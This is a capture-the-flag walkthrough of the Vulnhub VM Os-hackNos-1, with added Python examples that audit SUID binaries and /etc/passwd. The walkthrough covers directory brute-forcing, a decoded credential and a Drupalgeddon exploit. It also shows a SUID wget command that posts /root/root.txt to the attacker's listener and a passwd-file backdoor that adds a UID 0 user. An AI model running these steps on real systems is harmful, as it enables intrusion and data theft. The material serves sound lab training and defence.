
This time we’re doing the VM Os-hackNos-1 from Vulnhub. It’s an intermediate box created by Rahul Gehlaut and is part of the hackNos series.
Once we have the IP address of the box from running a netdiscover command, we can start up nmap and take a look at what is running on it.

So this should be an easy one, if the two open ports are anything to go on. We only really have one port to start with, as we don’t have any creds to use on the SSH port. With that in mind we should check out port 80 and see what site it’s running.

It’s just the default Apache install page, and after looking at the source code there was nothing of interest there either. So if we follow our normal enumeration methodology, we should now try to find any hidden directories that might be on the web server.

It seems like the site is running a Drupal blog, which is a little different from the usual blog we see on CTFs, which would be WordPress. So we should take a look at the blog and see what we can find out.

It seems like we might have a user named “James”. I’ve not really done a lot of Drupal hacking up to this point, so let’s jump over to Google and see if there is a Drupal equivalent to WPScan. There used to be a tool called DPScan, but I couldn’t find anything new on it and the articles I found were from 8 years ago.
Everything else seems like the default Drupal pages and settings. I think we’re missing something. We should go back to our enumeration and see if we might have missed something.
We’re going to switch our enumeration tool for this scan though, as we want to scan for directories and files this time. So we’ll use dirsearch, which is a really nice Python-based directory and file brute-force scanner.
We can set it all up with this command:
./dirsearch.py -u 192.168.1.194 -e txt -w /usr/share/wordlists/rockyou.txt -t 25
which aims the scan at our victim IP address, looks for the .txt extension with the -e flag, uses the rockyou wordlist given with the -w flag and, to make it all go a little faster, runs 25 threads with the -t flag.

After a few false starts (not giving it the correct wordlist or the correct flags), adding the -f flag to force the .txt extension onto the wordlist payloads got us a hit really quickly. It returned a file called alexander.txt.
We can navigate to the file and hopefully it’ll give us what we need to move forward.

Awesome, it looks like a base64-encoded string, which we can decode by echoing it on the command line and piping it to base64 -d.

When we decode the string it returns a very strange-looking string, but fortunately I have seen similar before and recognize it as the esoteric programming language Brainf*ck. We can use an online interpreter to execute the code and see what the output is.

Now this is what we have been looking for: we already made a note of the user James from the Drupal blog, but now we have a password to go with it. We should try them on the SSH port to see if we can log onto the box. If that doesn’t work, we will try them on the Drupal login panel. So SSH first.

It didn’t work, fair enough. It would have made the initial foothold easier, but there are more ways for us to access the box. We should make sure the creds are real by using them to log into the Drupal panel, and once we know whether they work we can start trying to use them to exploit the box.

We’re in. Let’s jump back over to Google and do a bit of research on exploiting Drupal. I know of an attack called Drupalgeddon but have never really had a use for it before. So we should start our research there and see if we can use it against this box.
After a quick Google I found that Metasploit has a module that can scan for and exploit the vulnerability. We should fire up msfconsole and see if we can get it to work.

We load the module and change some of the options to reflect our victim’s box.

Perfect, it worked as expected and we are now on the box with a Meterpreter shell. :-)
Let’s have a look around the box and upload one of our enumeration scripts to try and find the way forward. After trying a few times to upload the script, I was unable to chmod it to make it executable due to permission issues. So without falling further down the rabbit hole, we should take a look around the box manually to see if there is anything obvious that might help us move forward.

Whilst looking around we find the user.txt flag. So now let’s move on and try to find out what we can run or see that we are not meant to be able to. We can use the excellent g0tMi1k Linux priv esc cheat sheet to help us.
We can run a command that will search the box for all of the files with the SGID or SUID bit set.

As you can see above, there is an unusual one set on the wget binary. If we check the GTFOBins site we can get an understanding of how to use wget to exploit it and hopefully give us root privs.
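The same SUID/SGID search is worth running from the other side of the fence: an admin who compares the set-id binaries on a host against a known baseline catches an odd wget long before anyone consults GTFOBins. The block below is an added example, not code from the original post; the baseline list and the throwaway directory it builds for the demo are constructed, and the list should be tuned to the real image before it is trusted.

```python
import os
import stat
import tempfile

# Constructed baseline of binaries that are normally set-id on a Debian-style
# host. Anything set-id that is not on this list deserves a second look; wget,
# as found on this box, is the textbook case.
BASELINE = {
    "su", "sudo", "passwd", "chsh", "chfn", "gpasswd", "newgrp",
    "mount", "umount", "ping", "ssh-agent", "pkexec", "fusermount",
}


def find_setid(root):
    """Return sorted paths of regular files below `root` with SUID or SGID set.

    Equivalent to `find ROOT -type f -perm /6000` but tolerant of directories
    we cannot read and of files that vanish mid-walk.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue  # unreadable or already gone; skip it
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(path)
    return sorted(hits)


def unexpected_setid(root, baseline=BASELINE):
    """Set-id files whose basename is not on the baseline."""
    return [p for p in find_setid(root) if os.path.basename(p) not in baseline]


def demo_setid_audit():
    """Build a constructed tree with one expected SUID file (passwd), one
    unexpected one (wget) and one plain file (ls), and return the basenames
    the audit flags. Exists so the example runs without touching a real host.
    """
    with tempfile.TemporaryDirectory() as tmp:
        for name, mode in (("passwd", 0o4755), ("wget", 0o4755), ("ls", 0o755)):
            path = os.path.join(tmp, name)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(path, mode)
        return [os.path.basename(p) for p in unexpected_setid(tmp)]


if __name__ == "__main__":
    print(demo_setid_audit())  # ['wget'] on the constructed tree
    for path in unexpected_setid("/"):  # a real audit of the local host
        print("unexpected set-id binary:", path)
```

The baseline is keyed on basename only, which is enough to spot a stray wget but not a trojaned copy of a baseline name; for that, pair the list with package-manager verification (dpkg --verify or rpm -V) or a hash of each baseline binary.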

So now that we know we can run the highlighted command above, we can use it to read us the root flag file. We know the user flag was called user.txt, so we can guess that the root flag is called root.txt and is usually located at /root/root.txt.
So let’s run the command wget --post-file=/root/root.txt 192.168.1.183. This should give us the file as long as we have an nc listener open and waiting for it.
On the victim box we run:

Then on our machine we run nc -lnvp 80:

There it is, that’s game over.
****************************<UPDATE>****************************
We were able to read the file, but it didn’t feel finished as we didn’t actually get access as the root user on the box, so I went back to Google and GTFOBins to try to figure out a way of fully exploiting the box using wget.
The way I found was to use a few other binaries that had sticky bits set.

So now we have the potential to download and upload files from the box (namely the passwd file), and because we can exploit wget and run it as the root user we should be able to modify the passwd file, insert our own user into it, re-upload it to the box and have it accepted, as it’s all being done by the “root” user :-)
OK, let’s jump back into this and try to get full root access. First we need to send the passwd file to ourselves!

Now we have it, we can copy it into a file we make called passwd and add a new user to it. We can generate the password hash for this new user with the openssl command below:

Next we need to add ourselves to the passwd file, copying the same syntax as the actual root user.

Now that is done, we have to host it ready to be pulled back using the wget command on the victim box. Once it is copied back to their box it should be as simple as using su and giving it the password we just used when creating our user, “password123”.

The last thing is su’ing to the new hilton user.

There we go, full root access to the box, and again we can read the root.txt flag. That feels a lot more like actually completing the box compared to the first time.
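The reason the passwd trick works is that a password field which is not “x” is honoured directly and /etc/shadow is never consulted, so a second UID 0 line with an inline hash is a complete backdoor. It is also trivial to detect, which is the point of the added example below (not code from the original post): a small checker that flags inline hashes, empty password fields, extra UID 0 accounts and malformed lines. The sample file is constructed, with a placeholder in place of a real MD5-crypt hash and usernames borrowed from the writeup.

```python
# Constructed sample of an /etc/passwd with one tampered line appended in the
# style described above. The hash is a placeholder, not a real MD5-crypt value.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
james:x:1000:1000:james:/home/james:/bin/bash
hilton:$1$saltsalt$PLACEHOLDERHASHxxxxxxxxxxxxxx:0:0:root:/root:/bin/bash
"""

# Password-field values that defer to /etc/shadow or lock the account outright.
SHADOWED = {"x", "*", "!", "!!"}


def audit_passwd(text):
    """Return (line_number, username, reason) triples for suspicious entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid, gid, _gecos, _home, _shell = fields
        if not uid.isdigit() or not gid.isdigit():
            findings.append((lineno, name, "non-numeric uid/gid"))
            continue
        if pw == "":
            findings.append((lineno, name, "empty password field (no password required)"))
        elif pw not in SHADOWED:
            # An inline hash is used as-is; /etc/shadow is bypassed entirely.
            findings.append((lineno, name, "password hash stored in passwd, /etc/shadow bypassed"))
        if uid == "0" and name != "root":
            findings.append((lineno, name, "additional UID 0 account"))
    return findings


def audit_passwd_file(path="/etc/passwd"):
    """Run the checks against a file on disk."""
    with open(path, encoding="utf-8") as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for lineno, name, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {name}: {reason}")
```

On the constructed sample the hilton line is reported twice, once for the inline hash and once for the duplicate UID 0. On a live host, run `audit_passwd_file()` from cron and alert on any output, and pair it with file-integrity monitoring on /etc/passwd itself, since the overwrite-with-wget step leaves the file with a fresh mtime and, usually, different permissions from the original.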
I had so much fun on this CTF and actually learnt a lot on this one. I had not seen wget used as a priv esc vector before, but again the awesome GTFOBins site told me what I needed to know and helped us root the box.
Thanks to Rahul Gehlaut for creating the VM and to Vulnhub for hosting it and all the other great VMs on their site.
